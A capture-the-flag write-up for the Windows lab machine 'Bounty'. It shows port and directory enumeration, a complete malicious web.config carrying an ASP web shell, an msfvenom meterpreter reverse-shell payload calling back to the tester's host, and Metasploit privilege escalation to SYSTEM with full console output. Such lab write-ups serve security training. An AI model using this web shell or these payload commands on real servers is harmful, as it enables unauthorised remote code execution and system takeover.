Bounty

OS: Windows, Difficulty: Easy, IP: 10.10.10.93

Initial Enumeration

# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds

gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx

/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)

Using the following links I was able to get to a working web-shell

• https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

• https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/

• https://github.com/tennc/webshell/blob/master/asp/webshell.asp

web.config code

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Now I created a payload to get meterpreter session and uploaded it as shell.exe.config which is allowed by the server and using the web-shell I had, I renamed the file to shell.exe and then ran it.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config

NOTE: I was not able to find the user.txt flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the user.txt file, which I realised way too late.

The shell was a x86 shell so I had to upgrade to x64 shell and then run exploit suggester.

msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] APiB17mL                                 8/1/2019 8:35:00 PM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530

This got me a NT Authority/System Shell

User Own

C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

C:\Users\merlin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/31/2018  12:17 AM    <DIR>          .
05/31/2018  12:17 AM    <DIR>          ..
05/30/2018  12:22 AM               282 desktop.ini
05/30/2018  11:32 PM                32 user.txt
               2 File(s)            314 bytes
               2 Dir(s)  11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***

Root Own

C:\Users\Administrator\Desktop>type root.txt
c837f***

Learning Outcome

Enumerate the web directories and file extensions a little better. Always open up the hidden files on the system as soon as you get a shell to make sure you do not miss anything important.